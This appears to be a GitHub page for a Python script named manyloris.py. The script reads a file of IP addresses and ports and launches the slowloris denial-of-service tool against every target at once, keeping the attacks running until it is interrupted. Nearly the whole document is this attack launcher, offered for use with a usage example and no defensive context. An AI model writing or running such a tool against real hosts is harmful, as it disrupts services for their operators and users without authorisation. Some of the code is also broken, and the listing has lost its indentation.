-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathmanyloris.py
68 lines (48 loc) · 1.56 KB
/
manyloris.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import os
from signal import signal, SIGINT
import sys
import time
cmds = []
prcs = []
def build_cmd(target_list):
for t in target_list:
aux = t.split(':')
ports = aux[1:]
ip = aux[0]
for p in ports:
cmd = 'slowloris ' + ip + ' -p ' + p
cmds.append(cmd)
print(cmd)
def handler(signal_received, frame):
print("Exiting!")
for p in prcs:
p.close()
sys.exit(0)
def terminateProcess(signal, frame):
print('(SIGTERM) terminating the processes', signal)
sys.exit()
def main() -> int:
# check that the required arguments number was fulfilled
if len(sys.argv) != 2:
print('\nYou need to provide a list of targets.\n\n====Example list====\n123.423.1.1:80:443\n12.1.612.123:80:443:8443\n231.23.522.3:443:80\n141.101.123.30:443\n\n-> Note that the list must have a target per line and the ports seperated by ":".\n\n====Usage====\n\npython3 manyloris [PATH TO LIST]\n\ne.g. python3 manyloris ~/Documents/targets.txt')
sys.exit()
with open(sys.argv[1]) as file:
targets = file.readlines()
# build the commands for each target
build_cmd(targets)
start = input('\n\nWARNING! The Slowloris commands listed above are going to be executed.\nAre you sure that you want to proceed with %s targets? (Y/n)\n' % (len(targets)))
if start.lower() in ['n', 'no']:
sys.exit()
time.sleep(2)
# executing the commands
for cmd in cmds:
p = os.popen(cmd)
prcs.append(p)
signal(SIGINT, handler)
while True:
pass
return 0
if __name__ == '__main__':
while True: # to endlessly wait for SIGINT
main()
signal.signal(signal.SIGINT, terminateProcess)